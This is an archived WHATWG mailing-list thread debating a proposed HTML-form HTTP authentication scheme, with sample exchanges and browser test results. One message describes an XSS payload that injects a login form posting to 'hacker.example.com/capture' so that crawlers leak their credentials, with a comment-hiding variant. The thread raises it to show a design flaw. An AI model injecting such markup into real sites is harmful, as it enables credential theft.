1] HTTP/1.1 401 Unauthorized WWW-Authenticate: HTML realm=Administration !DOCTYPE html html form action=/login input name=username input type=password name=password input type=submit /form /html [Request 2] POST /login HTTP/1.1 username=adminpassword=secret [Response 2] HTTP/1.1 302 Found Authorization: HTML QWxhZGRpbjpvcGVuIHNlc2FtZQ== realm=Administration Location: /administration/ [Request 3] GET /administration/ HTTP/1.1 Authorization: HTML QWxhZGRpbjpvcGVuIHNlc2FtZQ== realm=Administration [Response 3] HTTP/1.1 200 OK !DOCTYPE html html ... h1Welcome!/h1 /html The twist here is that it is up to the server to provide the authentication token and through the 'Authorization' header, give the client a way to authorize future requests. I append the realm parameter to the 'Authorization' header to give the server and client a way to control authorization and more importantly deauthenticate (e.g. logout) for different realms on the same web site. Since more is up to the web application now, a deauthenticate works the following way: [Request] POST /logout HTTP/1.1 [Response] HTTP/1.1 200 OK Authorization: HTML realm=Administration !DOCTYPE html html ... h1Good bye!/h1 /html The empty token in the 'Authorization' header indicates that it should be forgotten for the given realm by the user agent and that future requests to resources within the same realm requires a reauthentication. This suggestion overloads the 'Authorization' header quite a bit, but since we're inventing a new authentication scheme that the UA needs to understand anyway, and especially if we get the HTTP WG on board here, I think this can only give positive effects. The alternative is to invent a new response header to serve the same purpose, but seeing as the request and response header -- if 'Authorization' is used -- are identical, a typical authentication by a browser supporting the HTML scheme is just to opaquely copy+pasting the entire 'Authorization' header from the request to the response. [1] http://www.w3.org/TR/NOTE-authentform -- Asbjørn Ulsberg -=|=- [EMAIL PROTECTED] «He's a loathsome offensive brute, yet I can't look away»
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008, Philip Taylor wrote: If I'm not misunderstanding things, there is a new attack scenario: I post a comment on someone's blog, saying a href=/restricted-access.php?xsshole=form action=http://hacker.example.com/capture name=logininput name=usernameinput name=password/formcrawl me!/a On their blog's web server, restricted-access.php require authentication, and unauthenticated access results in a 401 with 'WWW-Authenticate: HTML form=login' and the appropriate login form. But inevitably there's some kind of XSS hole in that page, so arbitrary markup can be inserted above the real login form. (Maybe they pass an error message in a parameter, which will be displayed above the form, but they forgot to escape the output.) Their internal search engine crawler is configured to know a username and password (and the form field names etc) for these restricted areas. It follows the link from my blog comment, it notices the WWW-Authenticate header, and like a good little bot it chooses to parse the HTML page and find the matching form and fill in the fields and submit the login details. But actually it's submitting my XSS-inserted form, and sending the login details to me. XSS holes already cause various security vulnerabilities; but they can't currently result in sensibly-written crawlers unwittingly submitting their login details to arbitrary third parties, so this is a new risk. Hm, this is indeed a problem. I can imagine a few ways to avoid this problem: 1) Don't write any pages with XSS holes. 2) Detect tampering by refusing to submit login details if = 2 forms match the name. 3) Only submit login details to same-origin URLs, or to some other restricted set. 4) Configure the crawler with the form submission URL, as well as the form field names and values, so it doesn't have to trust the HTML. 5) Change WWW-Authenticate so it gives all the details (submission URL, field names, etc), so nobody has to trust the HTML. But (1) is not going to happen in reality, so we should try to minimise the damage when XSS holes exist. (2) won't work because the attacker could write '...?xsshole=...!--' and the second form would be hidden. (3) is more sensible; perhaps the spec should explicitly note that you need to be quite careful about not submitting login forms to third-party sites unless you're sure you trust them? (3) won't work anyway, since sometimes the login form is cross-domain on purpose (e.g. OpenID). But even with (3), I could write a href=/restricted-access.php?xsshole=form action=/public-pastebin.php... and the crawler would send the login details to somewhere on the same host where I could still read them back, which doesn't seem great. So (4) is more sensible. You already have to configure the crawler with the form field names, so you might as well tell it what URL to submit to, and it shouldn't parse the HTML response or care about the form element. (Then there's no need for WWW-Authenticate to even say what the form name is.) (5) is basically the same, except it's late-binding the form details rather than hardcoding them into the crawler's configuration, and so it makes it easy to change the server-side login handling without reconfiguring everyone's crawlers. If we want to go with (4) or (5) then there is no need for this to be bound to an HTML form anymore, and we should remove it from the spec. Is there anyone who can volunteer to edit this section as a separate spec? I guess I'll remove this section. -- Ian Hickson U+1047E)\._.,--,'``.fL http://ln.hixie.ch/ U+263A/, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008, Jonas Sicking wrote: As I said at the F2F meeting in France, I don't think this is the right way to go. I think moving away from passwords and HTML logins are absolutely necessary. I agree. There are much better identity based authentication schemes out there. Many do have problems, but these problems can be addressed. Let's address them. I don't know how to do so. I'd much rather find a identity based solution that significantly can improve the current, really bad, situation regarding authentication. Well, given Philip`'s description of the security problem, and the observation that it needs to be changed in a way that decouples it from HTML, I'll remove the section soon. If anyone wants to edit it, please, take the text and run with it. -- Ian Hickson U+1047E)\._.,--,'``.fL http://ln.hixie.ch/ U+263A/, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Re: [whatwg] Solving the login/logout problem in HTML
Asbjørn Ulsberg wrote: [Request 1] GET /administration/ HTTP/1.1 [Response 1] HTTP/1.1 401 Unauthorized WWW-Authenticate: HTML realm=Administration !DOCTYPE html html form action=/login input name=username input type=password name=password input type=submit /form /html [Request 2] POST /login HTTP/1.1 username=adminpassword=secret [Response 2] HTTP/1.1 302 Found Authorization: HTML QWxhZGRpbjpvcGVuIHNlc2FtZQ== realm=Administration Location: /administration/ [Request 3] GET /administration/ HTTP/1.1 Authorization: HTML QWxhZGRpbjpvcGVuIHNlc2FtZQ== realm=Administration [Response 3] HTTP/1.1 200 OK !DOCTYPE html html ... h1Welcome!/h1 /html The twist here is that it is up to the server to provide the authentication token and through the 'Authorization' header, give the client a way to authorize future requests. Your auth token here seems to me to be equivalent to a session cookie. If you change the Authorization header in Response 2 to Set-Cookie (and make some syntactic adjustments) then this doesn't require any changes to how deployed apps handle sessions today.
Re: [whatwg] Solving the login/logout problem in HTML
Julian Reschke wrote: You can already handle the case of content that's available unauthenticated, but would potentially differ in case of being authenticated by adding Vary: Authorization to a response. According to section 14.8 of the HTTP 1.1 specification, the presence of the Authorization header field implies that the response varies by Authorization: When a shared cache (see section 13.7) receives a request containing an Authorization field, it MUST NOT return the corresponding response as a reply to any other request, unless one of the following specific exceptions holds: [some exceptions in the presence of cache-control directives] My understanding of this is that Vary: Authorization is effectively implied for all HTTP responses.
Re: [whatwg] Solving the login/logout problem in HTML
artin Atkins ha scritto: Asbjørn Ulsberg wrote: [Request 1] GET /administration/ HTTP/1.1 [Response 1] HTTP/1.1 401 Unauthorized WWW-Authenticate: HTML realm=Administration !DOCTYPE html html form action=/login input name=username input type=password name=password input type=submit /form /html [Request 2] POST /login HTTP/1.1 username=adminpassword=secret [Response 2] HTTP/1.1 302 Found Authorization: HTML QWxhZGRpbjpvcGVuIHNlc2FtZQ== realm=Administration Location: /administration/ [Request 3] GET /administration/ HTTP/1.1 Authorization: HTML QWxhZGRpbjpvcGVuIHNlc2FtZQ== realm=Administration [Response 3] HTTP/1.1 200 OK !DOCTYPE html html ... h1Welcome!/h1 /html The twist here is that it is up to the server to provide the authentication token and through the 'Authorization' header, give the client a way to authorize future requests. Your auth token here seems to me to be equivalent to a session cookie. If you change the Authorization header in Response 2 to Set-Cookie (and make some syntactic adjustments) then this doesn't require any changes to how deployed apps handle sessions today. Perhaps that token was meant as a cross-session one, surviving untill an explicit logout -- Email.it, the professional e-mail, gratis per te: http://www.email.it/f Sponsor: Innammorarsi è facile con Meetic, milioni di single si sono iscritti, si sono conosciuti e hanno riscoperto l'amore. Tutto con Meetic, prova anche tu! Clicca qui: http://adv.email.it/cgi-bin/foclick.cgi?mid=8292d=26-11
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: ... Ok let me rephrase. What are the user agent requirements for processing the realm value? For other schemes, it's basically show the realm to the user as a hint as to what password is wanted. But here we aren't going to show anything to the user. ... Yes. It's the same as with Basic and Digest when used for a non-interactive login. BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
Martin Atkins wrote: ... By that line of reasoning, you could equally argue that sites don't need this authentication scheme at all since they do just fine without it today. I think this new authentication scheme is most interesting when used in conjunction with other schemes, because it allows the same endpoint to be used for both browsers and other non-browser agents. ... That would be nice in theory, but will be tricky to deploy. The current proposal may fly because it doesn't require browsers to change (well, at least as long as they display the response body when the auth scheme is unknown -- which AFAIU is the case for FF and IE). Once you add a *known* scheme such as Basic or Digest, you'll get the authentication dialogue box most site designers want to avoid. One use-case, which I hinted at in my message, is pages that contain data annotated with microformats. These are useful both to browsers and non-browser agents, but today it's cumbersome to use microformats on pages that require authentication to view, since it is difficult for a non-browser agent to figure out how to log in to an arbitrary site without human intervention. Yes, that's the same case as spiders, WebDAV, feed readers, calendaring clients, whatnot. I went ahead and did some basic testing of this case, anyway. For my initial test, I arranged for my server to send a response like this: --- HTTP/1.0 401 Unauthorized Content-type: text/html WWW-Authenticate: HTML form=login WWW-Authenticate: Basic realm=test thing html head titleLog in/title /head body h1Log in/h1 form name=login action=/login.cgi?return_to=/testauth.cgi divUsername: input type=text name=u //div divPassword: input type=text name=p //div /form /body /html --- This case didn't turn out so well: * IE7: Displayed Basic login dialog * F3: Displayed Basic login dialog * O9.5: Displayed Basic login dialog Yes. In all cases, hitting Cancel on the login dialog caused the body to be rendered as a normal page, which is better than nothing but not really ideal. I swapped the ordering so that Basic came before HTML, but the results were the same. (as you'd expect.) I figured though that in most cases if your two types of clients are browsers and non-browser clients, it's quite likely that the non-browser clients will be using OAuth rather than Basic authentication, since that seems to be the big thing right now. I swapped out Basic for OAuth in my second WWW-Authenticate header above, and the results were more promising: * IE7: Rendered the response body as a normal page * F3: Rendered the response body as a normal page * O9.5: Displayed an error: The server requested an authentication method that is not supported. Yes, once the 'other' authentication scheme is new as well, this may work. ... BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, Nov 26, 2008 at 6:13 PM, Julian Reschke [EMAIL PROTECTED] wrote: * IE7: Rendered the response body as a normal page * F3: Rendered the response body as a normal page This behavior is what needs to be specified by this working group. The rest can be handled by authentication specifications. -- Robert Sayre
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: As can be seen in the feedback below, there is interest in improving the experience with logging in and out of Web sites. Currently there are two main mechanisms: HTTP authentication, and cookie-based authentication with a form login. Benefits of form authentication over HTTP authentication: - supports creating an account - supports recovering a lost password - supports showing the login form inline with other content - supports styling the login form - supports an obvious way of logging out from within the page Limitations of form authentication: - no way to indicate that access is being denied because the credentials passed were wrong or because there were no credentials passed - insecure when unencrypted It seems to me that the first limitation of form authentication could be removed by inventing a new WWW-Authenticate challenge that means reply to the form in the page. I have now specified such a value in HTML5 (since it is specific to entity bodies that contain HTML forms): This bit confused the hell out of me. Like Martin Atkins (no relation... probably) suggested, whenever someone's auth is bad for whatever reason I redirect them to the login page, possibly with an error message explaining what went wrong. I would never have imagined trying to solve this problem at the level you're suggesting, nor do I think it is particularly necessary, since every server side language can do a redirect by themselves. ~TJ
Re: [whatwg] Solving the login/logout problem in HTML
Hi Ian, thanks a lot for this proposal which seems to go into the right direction. I didn't yet have time to look into this in detail, but it currently seems to require the UA to still parse the HTML page. Wouldn't it be better of the *headers* of the response (such as WW-Authenticate, Link, ...) would contain sufficient information to perform the login without having to do that; such as a URI to POST to, plus the parameter names for user name and password? BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Tue, 25 Nov 2008, Tab Atkins Jr. wrote: This bit confused the hell out of me. Like Martin Atkins (no relation... probably) suggested, whenever someone's auth is bad for whatever reason I redirect them to the login page, possibly with an error message explaining what went wrong. You can still do that. You also have the opportunity to use a 401 on the login page itself. I would never have imagined trying to solve this problem at the level you're suggesting, nor do I think it is particularly necessary, since every server side language can do a redirect by themselves. It may be that few enough people want to use the HTTP mechanisms for this that the feature will need to be removed when the spec progresses to the next level. On Tue, 25 Nov 2008, Julian Reschke wrote: thanks a lot for this proposal which seems to go into the right direction. I didn't yet have time to look into this in detail, but it currently seems to require the UA to still parse the HTML page. Wouldn't it be better of the *headers* of the response (such as WW-Authenticate, Link, ...) would contain sufficient information to perform the login without having to do that; such as a URI to POST to, plus the parameter names for user name and password? The problem is that you'd basically have to duplicate the entire form, since login forms can be arbitrarily complex. If the bot has the username and password, why not also give it the username field name, password field name, and login script url? Just consider them part of the credentials. -- Ian Hickson U+1047E)\._.,--,'``.fL http://ln.hixie.ch/ U+263A/, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: ... I didn't yet have time to look into this in detail, but it currently seems to require the UA to still parse the HTML page. Wouldn't it be better of the *headers* of the response (such as WW-Authenticate, Link, ...) would contain sufficient information to perform the login without having to do that; such as a URI to POST to, plus the parameter names for user name and password? The problem is that you'd basically have to duplicate the entire form, since login forms can be arbitrarily complex. If the bot has the username and password, why not also give it the username field name, password field name, and login script url? Just consider them part of the credentials. That works in theory, but doesn't scale. For instance, we've been working on a search engine that scan internet sites that may require authentication. Configuring that login for each site would be a maintenance nightmare. So, on the other hand, if the login form is more complex than username + password, what is a bot supposed to do with it? BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson schrieb: On Tue, 25 Nov 2008, Julian Reschke wrote: The problem is that you'd basically have to duplicate the entire form, since login forms can be arbitrarily complex. If the bot has the username and password, why not also give it the username field name, password field name, and login script url? Just consider them part of the credentials. That works in theory, but doesn't scale. For instance, we've been working on a search engine that scan internet sites that may require authentication. Configuring that login for each site would be a maintenance nightmare. Well for a piece of software of that scale, parsing the document using an off-the-shelf HTML parser and finding the first matching form element and then applying normal HTML semantics to get to the form fields Ugh. Philipp Kempgen
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: For instance, we've been working on a search engine that scan internet sites that may require authentication. Configuring that login for each site would be a maintenance nightmare. Well for a piece of software of that scale, parsing the document using an off-the-shelf HTML parser and finding the first matching form element and then applying normal HTML semantics to get to the form fields seems like a pretty small task in comparison to the rest. Well, that's what we have been doing. I was looking forward where this could be used by somebody who isn't an expert (think Microsoft Webfolder client or Apple WebDAV FS driver), and where running an HTML parser (in the kernel?) would be problematic. So, on the other hand, if the login form is more complex than username + password, what is a bot supposed to do with it? I don't understand why it makes a difference what the form is like. It should apply whatever credentials it has been given -- whatever those might be, username/password, certificate, fake addressa and phone number, whatever, and submit the form. Just like a user. To do that, it would need to *capture* that information somewhere. I was assuming the whole point in the exercise was to avoid having to pop up an HTML based UI... BR, Julian PS: But even if it doesn't help authenticating without an HTML based UI, this could be useful because it allows non-interactive clients to understand that they're looking at a login form, not the real thing.
Re: [whatwg] Solving the login/logout problem in HTML
Julian Reschke schrieb: Ian Hickson wrote: For instance, we've been working on a search engine that scan internet sites that may require authentication. Configuring that login for each site would be a maintenance nightmare. Well for a piece of software of that scale, parsing the document using an off-the-shelf HTML parser and finding the first matching form element and then applying normal HTML semantics to get to the form fields seems like a pretty small task in comparison to the rest. Well, that's what we have been doing. I was looking forward where this could be used by somebody who isn't an expert (think Microsoft Webfolder client or Apple WebDAV FS driver), and where running an HTML parser (in the kernel?) would be problematic. So, on the other hand, if the login form is more complex than username + password, what is a bot supposed to do with it? I don't understand why it makes a difference what the form is like. It should apply whatever credentials it has been given -- whatever those might be, username/password, certificate, fake addressa and phone number, whatever, and submit the form. Just like a user. To do that, it would need to *capture* that information somewhere. I was assuming the whole point in the exercise was to avoid having to pop up an HTML based UI... PS: But even if it doesn't help authenticating without an HTML based UI, this could be useful because it allows non-interactive clients to understand that they're looking at a login form, not the real thing. Good points. There are circumstances where the client is not prepared to handle or parse HTML. However if the client is a human user you want a nice login page instead of the ugly basic authentication dialog. Philipp Kempgen -- http://www.das-asterisk-buch.de - http://www.the-asterisk-book.com Amooma GmbH - Bachstr. 126 - 56566 Neuwied - http://www.amooma.de Geschäftsführer: Stefan Wintermeyer, Handelsregister: Neuwied B14998 --
Re: [whatwg] Solving the login/logout problem in HTML
On Tue, 25 Nov 2008, Julian Reschke wrote: Well for a piece of software of that scale, parsing the document using an off-the-shelf HTML parser and finding the first matching form element and then applying normal HTML semantics to get to the form fields seems like a pretty small task in comparison to the rest. Well, that's what we have been doing. I was looking forward where this could be used by somebody who isn't an expert (think Microsoft Webfolder client or Apple WebDAV FS driver), and where running an HTML parser (in the kernel?) would be problematic. I wouldn't recommend running an HTTP parser in the kernel either. Anywhere where you can safely run an HTTP parser you can run an HTML parser too. So, on the other hand, if the login form is more complex than username + password, what is a bot supposed to do with it? I don't understand why it makes a difference what the form is like. It should apply whatever credentials it has been given -- whatever those might be, username/password, certificate, fake addressa and phone number, whatever, and submit the form. Just like a user. To do that, it would need to *capture* that information somewhere. I was assuming the whole point in the exercise was to avoid having to pop up an HTML based UI... Well if you don't have the credentials, you can't really login anyway. If the request is to be able to take an HTML form and display it to the user as some other UI, then just apply the HTML semantics to the form to get the UI out. That's exactly what HTML is _for_: encoding media- and presentation-independent semantics. PS: But even if it doesn't help authenticating without an HTML based UI, this could be useful because it allows non-interactive clients to understand that they're looking at a login form, not the real thing. Indeed. -- Ian Hickson U+1047E)\._.,--,'``.fL http://ln.hixie.ch/ U+263A/, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: I wouldn't recommend running an HTTP parser in the kernel either. Anywhere where you can safely run an HTTP parser you can run an HTML parser too. Maybe, maybe not. I'll leave the answer to those who need to do it. To do that, it would need to *capture* that information somewhere. I was assuming the whole point in the exercise was to avoid having to pop up an HTML based UI... Well if you don't have the credentials, you can't really login anyway. People are trained to configure credentials as value pairs (name, password). Anything more complex than that will be tricky to deploy in generic frameworks. In theory, you should be able to reformat everything that. If the request is to be able to take an HTML form and display it to the user as some other UI, then just apply the HTML semantics to the form to get the UI out. That's exactly what HTML is _for_: encoding media- and presentation-independent semantics. OK, so how do you tell a mount command that your credentials are more complex than username/password? For that matter, how do UAs like FF's password manager handle cases like these? ... BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Tue, 25 Nov 2008, Julian Reschke wrote: To do that, it would need to *capture* that information somewhere. I was assuming the whole point in the exercise was to avoid having to pop up an HTML based UI... Well if you don't have the credentials, you can't really login anyway. People are trained to configure credentials as value pairs (name, password). Anything more complex than that will be tricky to deploy in generic frameworks. Nothing requires servers to do anything but username/password. I don't really understand what you are asking here. Presumably in a system where only username/password credentials are desired, only username/ password credentials will be used. If the request is to be able to take an HTML form and display it to the user as some other UI, then just apply the HTML semantics to the form to get the UI out. That's exactly what HTML is _for_: encoding media- and presentation-independent semantics. OK, so how do you tell a mount command that your credentials are more complex than username/password? How do you tell a mount command that your credentials are a certificate? This isn't an HTML issue. For that matter, how do UAs like FF's password manager handle cases like these? Password managers vary in implementation, but some remember all fields, others just the password field and one other heuristically-chosen field, others bail on such forms. -- Ian Hickson U+1047E)\._.,--,'``.fL http://ln.hixie.ch/ U+263A/, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Re: [whatwg] Solving the login/logout problem in HTML
On Tue, 25 Nov 2008, Julian Reschke wrote: I was hoping that the authentication scheme you're defining can be used without parsing the HTML response. A simple way to achieve it would be to restrict it to username/password pairs, and to have the names of these form parameters live in the response headers as well. We would have to, at a minimum, include the name of the username field, the name of the password field, and the URL of the form to POST to. I am very wary of duplicating information that is already available as it tends to become out of date and thus ends up being even more of a pain than if the information isn't there in the first place. OK, so how do you tell a mount command that your credentials are more complex than username/password? How do you tell a mount command that your credentials are a certificate? If your credentials are a cert, why would you use form-base logon? (I admit I'm not an expert on these issue, so please by patient with me). My point was not that a form might use cert authentication, but that whatever mechanism is available today for logging in with authentication schemes other than username/password would be the same ones one would continue to use to login to systems with authentication schemes other than username/password. -- Ian Hickson U+1047E)\._.,--,'``.fL http://ln.hixie.ch/ U+263A/, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Re: [whatwg] Solving the login/logout problem in HTML
On Tue, 25 Nov 2008 05:26:47 -, Ian Hickson [EMAIL PROTECTED] wrote: http://www.w3.org/TR/1999/NOTE-authentform-19990203 [...] I don't really understand what problem the above solves that isn't solved better by SSL. I agree that if real security is desired, SSL is the only way to go. However given that most login forms on the web send passwords in the clear, other problems were more important than security. Form + Digest avoids these SSL problems: * Does not negatively impact performance. In TLS handshake lots of messages are going back and forth, so this can't be fixed by beefing up servers' CPUs. * Does not need access to server's configuration, and generation, installation and renewal of certificates. Redistributable software can support it out of the box, on almost any server, without manual installation steps. Additionally, it's better than new WWW-Authenticate: HTML authentication mechanism: * It's compatible with existing non-HTML HTTP clients. * Although its security is weak compared to SSL, it's a step up from forms + cookies. * It's easier to sell: It will allow bots to log in doesn't sound very desirable. It will protect your users' passwords against passive eavesdropping sounds better. I don't think WWW-Authenticate: HTML is a significant improvement. It doesn't offer anything to existing websites/browsers. It's primarily targetted for non-browser UAs, but it's not compatible with them. If UAs are required to parse HTML, they could as well look for form with a single password field. -- regards, Kornel Lesinski
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008, Kornel Lesinski wrote: On Tue, 25 Nov 2008 05:26:47 -, Ian Hickson [EMAIL PROTECTED] wrote: http://www.w3.org/TR/1999/NOTE-authentform-19990203 [...] I don't really understand what problem the above solves that isn't solved better by SSL. I agree that if real security is desired, SSL is the only way to go. However given that most login forms on the web send passwords in the clear, other problems were more important than security. Form + Digest avoids these SSL problems: * Does not negatively impact performance. In TLS handshake lots of messages are going back and forth, so this can't be fixed by beefing up servers' CPUs. This is also the case with form authentication. * Does not need access to server's configuration, and generation, installation and renewal of certificates. Redistributable software can support it out of the box, on almost any server, without manual installation steps. Form authentication is even easier to support than Digest auth. Additionally, it's better than new WWW-Authenticate: HTML authentication mechanism: * It's compatible with existing non-HTML HTTP clients. Agreed. * Although its security is weak compared to SSL, it's a step up from forms + cookies. Not really. If you can sniff the password from forms + cookies, then you can almost always also MitM a Digest connection, after which point you have basically lost. * It's easier to sell: It will allow bots to log in doesn't sound very desirable. It will protect your users' passwords against passive eavesdropping sounds better. Unfortunately, both of those advantages pale in comparison to you can style your login form, which is the real advantage of WWW-Authenticate: HTML and (in particular) HTML form authentication. I don't think WWW-Authenticate: HTML is a significant improvement. It doesn't offer anything to existing websites/browsers. It's primarily targetted for non-browser UAs, but it's not compatible with them. If UAs are required to parse HTML, they could as well look for form with a single password field. I agree that it's not that great. But it is slightly better than nothing, and the cost to support this is pretty minimal. -- Ian Hickson U+1047E)\._.,--,'``.fL http://ln.hixie.ch/ U+263A/, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: It seems to me that the first limitation of form authentication could be removed by inventing a new WWW-Authenticate challenge that means reply to the form in the page. I have now specified such a value in HTML5 (since it is specific to entity bodies that contain HTML forms): challenge = HTML [ form ] form = form = form-name form-name = quoted-string (There's no credentials value for this scheme, since the login is done as a POST to a login script and then the server sets proprietary login information, like a cookie using Set-Cookie.) So when you get to a page that expects you to be logged in, it return a 401 with: WWW-Authenticate: HTML form=login ...and there must be a form element with name=login, which represents the form that must be submitted to log in. This idea has promise, but is it compatible with existing browsers? The case where the only challenge included is HTML is probably okay, since browsers will at this point likely determine that they don't support any of the given schemes and just display the entity body. The only concern in this case is browser-provided default error pages for the 401 response, which can hopefully be suppressed in much the same way as sites suppress IE's default 404 error page by padding the response to take it above a certain filesize. More bothersome is this case: HTTP/1.1 401 Unauthorized ... WWW-Authenticate: HTML form=login WWW-Authenticate: Basic realm=... Will existing browsers see Basic there and use that in preference to displaying the error page? I suspect the answer is it depends. I recall that some browsers only use Basic if it appears first, or perhaps only ever use the first in the list, which would be great for the use case of supporting at the same endpoint HTML auth for browsers and some other mechanism for non-browser agents that can't render HTML. (For example, a Microformats parser may be able to parse HTML and extract data but not have a way to present usable forms to the user.) There's also one more case to consider. Many sites react to an unauthed request by *redirecting* to the login page. Maybe: HTTP/1.1 302 Found Location: /login.php WWW-Authenticate: HTML form=login Where in this case the form is assumed to be in the body of the resource at /login.php, not in the response body. UI-wise I'm imagining that browsers would auto-focus, highlight or otherwise make available easily the nominated form once rendered. Is that what you were imagining?